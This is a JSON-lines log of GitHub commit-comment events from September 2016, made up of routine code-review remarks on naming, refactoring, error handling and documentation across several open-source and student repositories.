{"id":"4549307562","type":"CommitCommentEvent","actor":{"login":"kzu"},"repo":{"name":"NuGet/NuGet.Client"},"payload":{"comment":{"id":18984783,"position":22,"line":22,"path":"src/NuGet.Core/NuGet.Build.Tasks.Pack/Pack.targets","commit_id":"9b899f5542d51507520eb358bdc1e5c325b57576","created_at":"2016-09-12T13:33:57Z","updated_at":"2016-09-12T13:33:57Z","body":"This property should be evaluated more lazily, ideally inside the Pack target itself (or some other dependent target), since it's typically determined dynamically, such as when using Nerdbank's git version, GitInfo and others. By \"fixing\" it at this level, you're forcing everyone to update two version properties, rather than a single one.\r\n\r\nTo follow .NET Core's approach to consuming the $(Version) property, take a look at https://github.com/nguerrera/sdk/blob/master/src/Tasks/Microsoft.NETCore.Build.Tasks/build/netstandard1.0/Microsoft.NETCore.GenerateAssemblyInfo.targets#L100-L107\r\n\r\nSo there should probably be a GetPackageVersion target..."}},"created_at":"2016-09-12T13:33:57Z"}
{"id":"4549310742","type":"CommitCommentEvent","actor":{"login":"hcav"},"repo":{"name":"hcav/2233"},"payload":{"comment":{"id":18984797,"position":null,"line":null,"path":null,"commit_id":"2382da64910e42f084e4925580cc7b9622aac4bc","created_at":"2016-09-12T13:34:31Z","updated_at":"2016-09-12T13:34:31Z","body":"test"}},"created_at":"2016-09-12T13:34:31Z"}
{"id":"4549312081","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984798,"position":197,"line":197,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:34:45Z","updated_at":"2016-09-12T13:34:45Z","body":"* Can be simplified to\r\n```go\r\nif err := http.ListenAndServe(\":4567\", nil); err != nil {\r\n\tlog.Fatal(\"ListenAndServe: \", err)\r\n}```"}},"created_at":"2016-09-12T13:34:45Z"}
{"id":"4549314512","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984803,"position":null,"line":null,"path":null,"commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:35:14Z","updated_at":"2016-09-12T13:35:14Z","body":"1. Добавить классы ко всем элементам."}},"created_at":"2016-09-12T13:35:14Z"}
{"id":"4549315053","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984804,"position":97,"line":92,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:35:19Z","updated_at":"2016-09-12T13:35:19Z","body":"Please add a short paragraph here for people who aren't familiar with Clojure records. Explain what a record is and show how to make one. Then connect that to Component by explaining who calls the constructor vs who calls the start/stop fns."}},"created_at":"2016-09-12T13:35:19Z"}
{"id":"4549319816","type":"CommitCommentEvent","actor":{"login":"kzu"},"repo":{"name":"NuGet/NuGet.Client"},"payload":{"comment":{"id":18984815,"position":106,"line":106,"path":"src/NuGet.Core/NuGet.Build.Tasks.Pack/Pack.targets","commit_id":"9b899f5542d51507520eb358bdc1e5c325b57576","created_at":"2016-09-12T13:36:12Z","updated_at":"2016-09-12T13:36:12Z","body":"It's probably a good idea to leverage the built-in `@(BuiltProjectOutputGroupOutput)` instead"}},"created_at":"2016-09-12T13:36:12Z"}
{"id":"4549320931","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18984818,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T13:36:23Z","updated_at":"2016-09-12T13:36:23Z","body":"Maybe : but it's really hard to find where is file(s) who produce this part of view.\r\n\r\nAnd the / in is a basic of templating too:\r\n\r\nSee the 1st example : http://twig.sensiolabs.org/doc/templates.html\r\n\r\ninclude is in twig, but it's hard to control what is finally included if user have total access to twig files "}},"created_at":"2016-09-12T13:36:23Z"}
{"id":"4549321454","type":"CommitCommentEvent","actor":{"login":"Janamou"},"repo":{"name":"kevmoo/firebase3-dart"},"payload":{"comment":{"id":18984822,"position":null,"line":null,"path":null,"commit_id":"462c9498cac7af8e351ad6ea5e39baf2a8acf75f","created_at":"2016-09-12T13:36:29Z","updated_at":"2016-09-12T13:36:29Z","body":"@kevmoo awesome! Do you want to help with something e.g. with writing the example then? :-)"}},"created_at":"2016-09-12T13:36:29Z"}
{"id":"4549324346","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984829,"position":125,"line":120,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:37:01Z","updated_at":"2016-09-12T13:37:01Z","body":"I've been trying to make the guides accessible to people new to Clojure or FP. \"Idempotent\" is a word that many programmers are not familiar with. Is there a way to reword this so we can introduce the _idea_ first, then attach the word \"idempotent\" (perhaps in a parenthetical?)"}},"created_at":"2016-09-12T13:37:01Z"}
{"id":"4549325402","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"JorikdeBoer/jorik_de_boer"},"payload":{"comment":{"id":18984832,"position":null,"line":null,"path":null,"commit_id":"0c8e91a0eefa2bca97c8adad392b1016b26f200d","created_at":"2016-09-12T13:37:14Z","updated_at":"2016-09-12T13:37:14Z","body":"Oops, I expected a Pull Request and just clicked the green bottons :dizzy_face: "}},"created_at":"2016-09-12T13:37:14Z"}
{"id":"4549326993","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984835,"position":129,"line":124,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:37:32Z","updated_at":"2016-09-12T13:37:32Z","body":"It's not preferred... if you use `dissoc`, then the component breaks!"}},"created_at":"2016-09-12T13:37:32Z"}
{"id":"4549327423","type":"CommitCommentEvent","actor":{"login":"hcav"},"repo":{"name":"hcav/2233"},"payload":{"comment":{"id":18984836,"position":null,"line":null,"path":null,"commit_id":"47a74ecdf8d86cd851a0ef01c6ca42d849d6d988","created_at":"2016-09-12T13:37:38Z","updated_at":"2016-09-12T13:37:38Z","body":"test"}},"created_at":"2016-09-12T13:37:38Z"}
{"id":"4549329319","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984839,"position":16,"line":16,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:37:58Z","updated_at":"2016-09-12T13:37:58Z","body":"* Redundant decomposition: ф-я выполняет слишком короткую и простую операцию и не подходит для повторного использования\r\n* Naming: Should be named 'MakeIncomingUserMessagesMap'"}},"created_at":"2016-09-12T13:37:58Z"}
{"id":"4549329634","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984840,"position":138,"line":133,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:38:02Z","updated_at":"2016-09-12T13:38:02Z","body":"Is this only useful for testing? I would expect it to be required for the real system as well."}},"created_at":"2016-09-12T13:38:02Z"}
{"id":"4549332795","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984845,"position":151,"line":146,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:38:36Z","updated_at":"2016-09-12T13:38:36Z","body":"It's probably OK to combine these two code blocks, since they're so small."}},"created_at":"2016-09-12T13:38:36Z"}
{"id":"4549333161","type":"CommitCommentEvent","actor":{"login":"SethMichaelLarson"},"repo":{"name":"python/asyncio"},"payload":{"comment":{"id":18984846,"position":6,"line":44,"path":"asyncio/selector_events.py","commit_id":"bea3a4247a450be7fb82dec111429bb2752aac4d","created_at":"2016-09-12T13:38:40Z","updated_at":"2016-09-12T13:38:40Z","body":"Wouldn't it just be faster and simpler to do two equality checks since there's only two elements?"}},"created_at":"2016-09-12T13:38:40Z"}
{"id":"4549333811","type":"CommitCommentEvent","actor":{"login":"MichaelMraka"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":18984851,"position":3,"line":522,"path":"dnf/conf/config.py","commit_id":"8dd2e59aff4541b2ce7af2fa3dce8342860ee505","created_at":"2016-09-12T13:38:47Z","updated_at":"2016-09-12T13:38:47Z","body":"Agree."}},"created_at":"2016-09-12T13:38:47Z"}
{"id":"4549333931","type":"CommitCommentEvent","actor":{"login":"Hayben"},"repo":{"name":"ChenYilong/iOSInterviewQuestions"},"payload":{"comment":{"id":18984852,"position":null,"line":null,"path":null,"commit_id":"85068cddc8324bf1aeea82fc7eb6381095390183","created_at":"2016-09-12T13:38:49Z","updated_at":"2016-09-12T13:38:49Z","body":"666"}},"created_at":"2016-09-12T13:38:49Z"}
{"id":"4549334466","type":"CommitCommentEvent","actor":{"login":"tamlyn10"},"repo":{"name":"tamlyn10/barefootbidders"},"payload":{"comment":{"id":18984854,"position":1,"line":1,"path":"app/assets/stylesheets/OneFrameworkToRuleThemAll/one-forms.scss","commit_id":"09dc584981d0afd7cd6e4d36fddaea8ead680f6e","created_at":"2016-09-12T13:38:55Z","updated_at":"2016-09-12T13:38:55Z","body":"One framework to rule them all..."}},"created_at":"2016-09-12T13:38:55Z"}
{"id":"4549335844","type":"CommitCommentEvent","actor":{"login":"dukeboard"},"repo":{"name":"kevoree-modeling/mwDB"},"payload":{"comment":{"id":18984858,"position":5,"line":19,"path":"core/src/main/java/org/mwg/core/task/ActionDefineVar.java","commit_id":"2cebb2b7deb3c028c365e026976344590fe82019","created_at":"2016-09-12T13:39:13Z","updated_at":"2016-09-12T13:39:13Z","body":"what ?"}},"created_at":"2016-09-12T13:39:13Z"}
{"id":"4549338759","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984867,"position":189,"line":184,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:39:44Z","updated_at":"2016-09-12T13:39:44Z","body":"Why \"app\" instead of \"system?\""}},"created_at":"2016-09-12T13:39:44Z"}
{"id":"4549341109","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"Wyzardsleeves/bloc-jams"},"payload":{"comment":{"id":18984875,"position":23,"line":19,"path":"index.html","commit_id":"5cc6a1a8b723d3e28aa0af4a42bfc07241735115","created_at":"2016-09-12T13:40:11Z","updated_at":"2016-09-12T13:40:11Z","body":"Again, `<section>` and not `<sections>` :)"}},"created_at":"2016-09-12T13:40:11Z"}
{"id":"4549344947","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984879,"position":291,"line":286,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:40:50Z","updated_at":"2016-09-12T13:40:50Z","body":"Why does this matter?"}},"created_at":"2016-09-12T13:40:50Z"}
{"id":"4549346869","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984884,"position":29,"line":29,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:41:12Z","updated_at":"2016-09-12T13:41:12Z","body":"* Mixed panic and returning error approaches. Should choose one."}},"created_at":"2016-09-12T13:41:12Z"}
{"id":"4549350886","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984892,"position":28,"line":28,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:41:55Z","updated_at":"2016-09-12T13:41:55Z","body":"* Error is never returned"}},"created_at":"2016-09-12T13:41:55Z"}
{"id":"4549352048","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984897,"position":25,"line":25,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:42:09Z","updated_at":"2016-09-12T13:42:09Z","body":"* Error is not logged"}},"created_at":"2016-09-12T13:42:09Z"}
{"id":"4549354961","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984905,"position":264,"line":259,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:42:38Z","updated_at":"2016-09-12T13:42:38Z","body":"This paragraph is a good place to offer the reader a glimpse ahead. This section appears to lead up to unit testing the /greet route. Let the reader know that so the next few code blocks make sense in context."}},"created_at":"2016-09-12T13:42:38Z"}
{"id":"4549357130","type":"CommitCommentEvent","actor":{"login":"zbwa"},"repo":{"name":"zbwa/learningC"},"payload":{"comment":{"id":18984915,"position":null,"line":null,"path":null,"commit_id":"3dd8b1078e736f1d19f19eb6d6ab46db1fd21675","created_at":"2016-09-12T13:43:01Z","updated_at":"2016-09-12T13:43:01Z","body":"#include <stdio.h>\r\n#define marrayx 10\r\n\r\nint a[10] = {5, 1, 6, 3, 2, 0, 9, 8, 7, 4};\r\n\r\nint main(void)\r\n{\r\n    int min;\r\n    int t;\r\n    for (int i = 0; i < 9; i++)\r\n    {\r\n        min = i;\r\n        t = a[i];\r\n        for (int j = i+1; j < 10; j++)\r\n        {\r\n            if (a[j] < a[min])\r\n            {\r\n                min = j;\r\n            }\r\n        }\r\n        a[i] = a[min];\r\n        a[min] = t;\r\n    }\r\n    for (int i = 0; i < 10; i++)\r\n    {\r\n        printf(\"%d\\n\", a[i]);\r\n    }\r\n}"}},"created_at":"2016-09-12T13:43:01Z"}
{"id":"4549357339","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18984916,"position":null,"line":null,"path":null,"commit_id":"6a0f461b90cfd66080600968ed100d3dcbf9b3ff","created_at":"2016-09-12T13:43:04Z","updated_at":"2016-09-12T13:43:04Z","body":"++"}},"created_at":"2016-09-12T13:43:04Z"}
{"id":"4549357792","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18984917,"position":4,"line":4,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:43:10Z","updated_at":"2016-09-12T13:43:10Z","body":"Put in a header file."}},"created_at":"2016-09-12T13:43:10Z"}
{"id":"4549358265","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984919,"position":22,"line":22,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:43:15Z","updated_at":"2016-09-12T13:43:15Z","body":"* Naming: 1st arg is not port number but address by meaning"}},"created_at":"2016-09-12T13:43:15Z"}
{"id":"4549358952","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18984922,"position":11,"line":11,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:43:21Z","updated_at":"2016-09-12T13:43:21Z","body":"Unused. Remove."}},"created_at":"2016-09-12T13:43:21Z"}
{"id":"4549360519","type":"CommitCommentEvent","actor":{"login":"zbwa"},"repo":{"name":"zbwa/learningC"},"payload":{"comment":{"id":18984926,"position":null,"line":null,"path":null,"commit_id":"3dd8b1078e736f1d19f19eb6d6ab46db1fd21675","created_at":"2016-09-12T13:43:37Z","updated_at":"2016-09-12T13:43:37Z","body":"Сортировка выбором"}},"created_at":"2016-09-12T13:43:37Z"}
{"id":"4549360936","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18984931,"position":12,"line":12,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:43:42Z","updated_at":"2016-09-12T13:43:42Z","body":"Better names. How about operand1 and operand2?"}},"created_at":"2016-09-12T13:43:42Z"}
{"id":"4549363207","type":"CommitCommentEvent","actor":{"login":"Bertg"},"repo":{"name":"rodrigues/react-daterange-picker"},"payload":{"comment":{"id":18984941,"position":null,"line":null,"path":null,"commit_id":"8d4fa77b35743b78c180d9c3d5cf6ec1425451f1","created_at":"2016-09-12T13:44:07Z","updated_at":"2016-09-12T13:44:07Z","body":"In https://github.com/rodrigues/react-daterange-picker/blob/master/src/calendar/CalendarMonth.jsx#L117 You should use a prop (e.g.: yearIncrements (as a number or 2 value array)) with default val :)"}},"created_at":"2016-09-12T13:44:07Z"}
{"id":"4549363317","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18984942,"position":21,"line":21,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:44:08Z","updated_at":"2016-09-12T13:44:08Z","body":"Refactor this into a single `getOperator()` method."}},"created_at":"2016-09-12T13:44:08Z"}
{"id":"4549364325","type":"CommitCommentEvent","actor":{"login":"Ovahlord"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18984947,"position":null,"line":null,"path":null,"commit_id":"fb1f98ad090b63ea1fad390e42896b78e43fd804","created_at":"2016-09-12T13:44:19Z","updated_at":"2016-09-12T13:44:19Z","body":"My PR is still waiting for a merge. The functionality is there. The mentoined speed aura there needs a seperate implementation."}},"created_at":"2016-09-12T13:44:19Z"}
{"id":"4549366086","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984948,"position":402,"line":397,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:44:35Z","updated_at":"2016-09-12T13:44:35Z","body":"It's OK to make a forward link to the next guide. Just make a placeholder doc there with the standard section headings.\r\n\r\nPlease also provide some additional motivation. Right now this looks like boilerplate... and the community generally frowns on boilerplate. The real value of Component won't be clear _until_ the dependencies are injected."}},"created_at":"2016-09-12T13:44:35Z"}
{"id":"4549366176","type":"CommitCommentEvent","actor":{"login":"yorikvanhavre"},"repo":{"name":"OpeningDesign/FreeMVD_WorkFlow"},"payload":{"comment":{"id":18984949,"position":null,"line":null,"path":null,"commit_id":"ba335ee06ebbb4c0b7a5d90c83cc8aa0f8fb8f99","created_at":"2016-09-12T13:44:35Z","updated_at":"2016-09-12T13:44:35Z","body":"Great! We're progressing!"}},"created_at":"2016-09-12T13:44:35Z"}
{"id":"4549367481","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18984953,"position":27,"line":27,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:44:49Z","updated_at":"2016-09-12T13:44:49Z","body":"Change to getOperator(), which is more descriptive."}},"created_at":"2016-09-12T13:44:49Z"}
{"id":"4549367692","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984955,"position":405,"line":400,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:44:51Z","updated_at":"2016-09-12T13:44:51Z","body":"I like this section. Good idea!"}},"created_at":"2016-09-12T13:44:51Z"}
{"id":"4549369070","type":"CommitCommentEvent","actor":{"login":"Bertg"},"repo":{"name":"rodrigues/calendar.js"},"payload":{"comment":{"id":18984961,"position":null,"line":null,"path":null,"commit_id":"bc657082f4860649df59163906478a425b44c646","created_at":"2016-09-12T13:45:08Z","updated_at":"2016-09-12T13:45:08Z","body":"Commented code :) really? :)"}},"created_at":"2016-09-12T13:45:08Z"}
{"id":"4549370398","type":"CommitCommentEvent","actor":{"login":"domien96"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18984966,"position":null,"line":null,"path":null,"commit_id":"4a596d3e90ff44aba8fd792608243e3b50be0b39","created_at":"2016-09-12T13:45:22Z","updated_at":"2016-09-12T13:45:22Z","body":"Ja tis maar een stub versie.\nEn over welke functies heb je het juist die ik moet gebruiken?\n\nOp 12 september 2016 08:17 schreef GrigoriLomonosov <\nnotifications@github.com>:\n\n> Waarom werk je juist met isEmpty? Dan moet je alles nog eens controleren\n> op lege vakjes. Kan je niet gewoon met de return values werken van de\n> functies (0== succes/toevoeging). Dan heb je geen extra methode nodig en\n> minder berekeningen. Nu zal je na iedere stap in de lus nog eens alles\n> overlopen.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GrigoriLomonosov/BinaryPuzzleSolver/commit/4a596d3e90ff44aba8fd792608243e3b50be0b39#commitcomment-18980223>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJgnK4yof7gxadPBFdhRlc6VFJttU1mFks5qpO5hgaJpZM4J6Q-9>\n> .\n>\n\n\n\n-- \nMet vriendelijke Groet\nDomien.. :)\n"}},"created_at":"2016-09-12T13:45:22Z"}
{"id":"4549371701","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18984972,"position":55,"line":55,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:45:36Z","updated_at":"2016-09-12T13:45:36Z","body":"This looks a little odd. Can you maintain a boolean that tells you whether you should be asking the user for input"}},"created_at":"2016-09-12T13:45:36Z"}
{"id":"4549374888","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18984977,"position":58,"line":58,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:46:10Z","updated_at":"2016-09-12T13:46:10Z","body":"Not a descriptive name. Call is `getOperands()`?"}},"created_at":"2016-09-12T13:46:10Z"}
{"id":"4549376313","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18984988,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T13:46:24Z","updated_at":"2016-09-12T13:46:24Z","body":"HAH, I knew that there were going to be no girls in the DE class!"}},"created_at":"2016-09-12T13:46:24Z"}
{"id":"4549377006","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18984992,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T13:46:32Z","updated_at":"2016-09-12T13:46:32Z","body":"again: if it's possible to include files in twig, I'm not against it. "}},"created_at":"2016-09-12T13:46:32Z"}
{"id":"4549380592","type":"CommitCommentEvent","actor":{"login":"seibert"},"repo":{"name":"numba/llvmlite"},"payload":{"comment":{"id":18984997,"position":null,"line":null,"path":null,"commit_id":"9963a73d36e95a453d5559c05d7582044442e6d3","created_at":"2016-09-12T13:47:10Z","updated_at":"2016-09-12T13:47:10Z","body":"Yes, this was merged into the README."}},"created_at":"2016-09-12T13:47:10Z"}
{"id":"4549385648","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18985004,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T13:48:03Z","updated_at":"2016-09-12T13:48:03Z","body":"It is: http://twig.sensiolabs.org/doc/tags/include.html\r\n\r\nQuestion is what security issues it implies."}},"created_at":"2016-09-12T13:48:03Z"}
{"id":"4549389736","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18985010,"position":null,"line":null,"path":null,"commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:48:43Z","updated_at":"2016-09-12T13:48:43Z","body":".photo>img.-preview+.-info>.-title+.-note+.-like>.-like-button+.-like-counter"}},"created_at":"2016-09-12T13:48:43Z"}
{"id":"4549389825","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18985011,"position":83,"line":83,"path":"Calculator.cpp","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:48:44Z","updated_at":"2016-09-12T13:48:44Z","body":"You don't actually need the addition(), subtraction(), etc. functions. You should refactor your code so that you have the following: 1) getOperator(), 2) getOperands(), 3) displayResult(). Inside displayResult(), perform the calculation and output the result."}},"created_at":"2016-09-12T13:48:44Z"}
{"id":"4549390940","type":"CommitCommentEvent","actor":{"login":"yorikvanhavre"},"repo":{"name":"OpeningDesign/FreeMVD_WorkFlow"},"payload":{"comment":{"id":18985013,"position":null,"line":null,"path":null,"commit_id":"690b785399357df7d0a875fcea8b61e26b4dff7d","created_at":"2016-09-12T13:48:56Z","updated_at":"2016-09-12T13:48:56Z","body":"@theoryshaw Have a look at these.. It's two times the same file, the only difference is entity #49, in the first test it's an IfcWallStandardCase, in the second it's an IfcWall. If both work, then we can already rule out the StandardCase stuff.\r\n\r\nIn both files, everything up to #63 comes from FreeCAD. #64 to #70 have been added manually. I believe the key to make it work in Revit is the combination of IfcWallType + IfcMaterialLayerSet. For a wall to work , it must have both."}},"created_at":"2016-09-12T13:48:56Z"}
{"id":"4549391163","type":"CommitCommentEvent","actor":{"login":"shailen"},"repo":{"name":"sahil-mehra/calculator"},"payload":{"comment":{"id":18985014,"position":1,"line":1,"path":"README.md","commit_id":"2a341ccfa5826b41d3633a78223b8f61d2b3a132","created_at":"2016-09-12T13:49:00Z","updated_at":"2016-09-12T13:49:00Z","body":"Something more descriptive."}},"created_at":"2016-09-12T13:49:00Z"}
{"id":"4549392530","type":"CommitCommentEvent","actor":{"login":"covyta"},"repo":{"name":"covyta/savy"},"payload":{"comment":{"id":18985023,"position":null,"line":null,"path":null,"commit_id":"95dd733ad38355da99bc5bfea54beff1fec85fe5","created_at":"2016-09-12T13:49:14Z","updated_at":"2016-09-12T13:49:14Z","body":"95dd733 What does is mean?"}},"created_at":"2016-09-12T13:49:14Z"}
{"id":"4549394766","type":"CommitCommentEvent","actor":{"login":"jbialobr"},"repo":{"name":"Maximus5/ConEmu"},"payload":{"comment":{"id":18985030,"position":null,"line":null,"path":null,"commit_id":"f784acb747ee650de74a440e7cc8b5995734420b","created_at":"2016-09-12T13:49:37Z","updated_at":"2016-09-12T13:49:37Z","body":"Thank you!"}},"created_at":"2016-09-12T13:49:37Z"}
{"id":"4549397927","type":"CommitCommentEvent","actor":{"login":"domien96"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18985037,"position":null,"line":null,"path":null,"commit_id":"03fcdb0e259be1558de868e7f8c473716d5aa199","created_at":"2016-09-12T13:50:13Z","updated_at":"2016-09-12T13:50:13Z","body":"Je kan voor de lus wel nog een if zetten inderdaad.\r\nEn wat bedoel je met foutafhandeling? Dit is gewoon een controle zodat ik het freeën van een nullptr vermijdt, want dat zou crashen in sommige gevallen."}},"created_at":"2016-09-12T13:50:13Z"}
{"id":"4549399252","type":"CommitCommentEvent","actor":{"login":"markus2330"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":18985040,"position":17,"line":373,"path":"src/plugins/crypto/gpg.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-12T13:50:26Z","updated_at":"2016-09-12T13:50:26Z","body":"Are these changes intentional?"}},"created_at":"2016-09-12T13:50:26Z"}
{"id":"4549407068","type":"CommitCommentEvent","actor":{"login":"James1x0"},"repo":{"name":"associatedemployers/granite"},"payload":{"comment":{"id":18985056,"position":14,"line":29,"path":"app/models/company.js","commit_id":"febb4fafd7e446d4e9373aacd0bccda1d0163700","created_at":"2016-09-12T13:51:48Z","updated_at":"2016-09-12T13:51:48Z","body":"@jscottchapman I know this seems weird, but we should stray from inverse relationships like this, only because they can grow to large bounds and will cause models to take forever to load."}},"created_at":"2016-09-12T13:51:48Z"}
{"id":"4549407964","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/ci-dnf-stack"},"payload":{"comment":{"id":18985058,"position":8,"line":14,"path":"dnf-docker-test/features/repolist-2.feature","commit_id":"6756a2caede2d9bd4a548c73a8a3a029e389cadd","created_at":"2016-09-12T13:51:57Z","updated_at":"2016-09-12T13:51:57Z","body":"what's the point of checking that command fails and stderr is empty?"}},"created_at":"2016-09-12T13:51:57Z"}
